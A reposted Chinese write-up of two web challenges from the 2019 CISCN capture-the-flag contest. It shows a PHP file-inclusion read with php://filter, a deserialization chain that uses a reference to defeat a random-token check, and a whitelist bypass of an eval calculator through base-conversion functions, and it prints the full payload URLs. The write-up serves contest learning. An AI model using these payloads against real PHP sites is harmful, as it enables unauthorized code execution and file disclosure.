碼上快樂

相關內容    簡體    繁體

2019全國大學生信息安全大賽兩道web

本文轉載自   查看原文   2019-05-02 00:49   787    CTF

簡單小結

菜鳥第一次打國賽,這次題目質量很高,學到了許多姿勢。

Web

Justsoso

打開題目,源代碼出存在提示:

使用LFI讀取index.php與hint.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=index.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=hint.php

得如下源碼:

<html>
<?php
error_reporting(0); 
$file = $_GET["file"]; 
$payload = $_GET["payload"];
if(!isset($file)){
	echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
	die('hack attacked!!!');
}
@include($file);
if(isset($payload)){  
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) { 
    	    die('stop hacking!');
    	    exit();
        }
    }
    $payload = unserialize($payload);
}else{ 
   echo "Missing parameters"; 
} 
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
		foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
	public function __construct($handle) { 
        $this->handle = $handle; 
    } 
	public function __destruct(){
		$this->handle->getFlag();
	}
}

class Flag{
    public $file;
    public $token;
    public $token_flag;
 
    function __construct($file){
		$this->file = $file;
		$this->token_flag = $this->token = md5(rand(1,10000));
    }
    
	public function getFlag(){
		$this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
		{
			if(isset($this->file)){
				echo @highlight_file($this->file,true); 
            }  
        }
    }
}
?>

很容易可以知道此題考的是php反序列化,通過file引入hint.phpindex.php,操作payload反序列化執行類中的getflag()函數
此題有兩個難點:
正則Flag判斷繞過與隨機數md5判斷的繞過
前者可通過使用 /// 繞過parse_url()函數,此時該函數獲取到的內容為空,而后者可以使用指針來將token_flag指向token,來使兩者恆等。

添加以下代碼在本地生成序列化字符串:

$a = new Flag(‘flag.php’);
$a->token_flag = &$a->token;
$b = new Handle($a);
echo urlencode(serialize($b));

輸出的結果為:

O%3A6%3A%22Handle%22%3A1%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22bc573864331a9e42e4511de6f678aa83%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B%7D%7D

注意里邊有不可見字符%00,且需要將Handle的對象數量改成2+,這樣才可以進入__destruct函數。
故最終payload為:

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"bc573864331a9e42e4511de6f678aa83";s:10:"token_flag";R:4;}}

love_math

打開題目,發現在js地址出使用ajax向calc.php發送數據
使用瀏覽器訪問之,得源碼

<?php 
error_reporting(0); 
//聽說你很喜歡數學,不知道你是否愛它勝過愛flag 
if(!isset($_GET['c'])){ 
    show_source(__FILE__); 
}else{ 
    //例子 c=20-1 
    $content = $_GET['c']; 
    if (strlen($content) >= 80) { 
        die("太長了不會算"); 
    } 
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; 
    foreach ($blacklist as $blackitem) { 
        if (preg_match('/' . $blackitem . '/m', $content)) { 
            die("請不要輸入奇奇怪怪的字符"); 
        } 
    } 
    //常用數學函數http://www.w3school.com.cn/php/php_ref_math.asp 
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); 
    foreach ($used_funcs[0] as $func) { 
        if (!in_array($func, $whitelist)) { 
            die("請不要輸入奇奇怪怪的函數"); 
        } 
    } 
    //幫你算出答案 
    eval('echo '.$content.';'); 
}

可以看到過濾了一些常用字符和基於白名單的過濾,
限制得比較死,故此處我們只能使用白名單內的函數來進行命令執行,且不能有黑名單內的字符。

我們注意到,白名單里邊的base_convert、dechex、decbin等用於進制轉換的函數,我們可以使用其來繞過基於白名單的檢測。比如:phpinfo可以將phpinfo先轉換成hex,在轉換成十進制,這樣就可以做到無字母執行函數。

由於長度問題,我們無法直接在參數c里傳過多的白名單函數+字符,所以這里我們使用其他GET參數傳入,不直接使用參數c,即可繞過,但要注意的是此處的參數名,不能為字母,只能為數字,不然會被第二個關鍵詞白名單所攔截。

再由於Ascii轉成Hex后轉回來需要hex2bin函數,而白名單里並沒有這個函數,所以我們需要使用進制轉換進行繞過,又因為hex2bin里部分字母只有在32進制后才會出現,所以此處我們選擇36進制。將hex2bin36進制成無字母的10進制得到:37907361743我們使用base_convert(37907361743,10,36即可轉換成hex2bin,而_GEThex5f474554,里邊包含了字母f,需要在進行一次轉換:f正好為16進制里的最后一個字母,可直接使用dechex(1598506324)即可繞過。故$sin=base_convert(37907361743,10,36)(dechex(1598506324))即為$sin=_GET
接着我們繼續構造:
我們知道:$$sin = $_GET
那么$$sin[a]()即可自定義函數名,但主要此處參數不可為字母,且[]被過濾,故改成`$$sin{0}($$sin{1})``
所以payload構造如下:

?C=$sin=base_convert(37907361743,10,36)(dechex(1598506324));$$sin{0}($$sin{1});&0=show_source&1=flag.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 2019全國大學生信息安全競賽ciscn-writeup(4web) 2019全國大學生信息安全競賽部分Web writeup 2020第十三屆全國大學生信息安全創新實踐大賽 z3 第十屆全國大學生信息安全競賽-web-writeup 2019年第十二屆全國大學生信息安全實踐創新賽線上賽Writeup 全國大學生信息安全競賽—創新實踐能力賽初賽部分wp 全國大學生信息安全競賽初賽writeup 全國大學生信息安全競賽初賽2020writeup CISCN2021-第十四屆全國大學生信息安全競賽-WriteUp CTF-i春秋-Web-偏移、置換密碼-破譯-2016全國大學生信息安全競賽
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM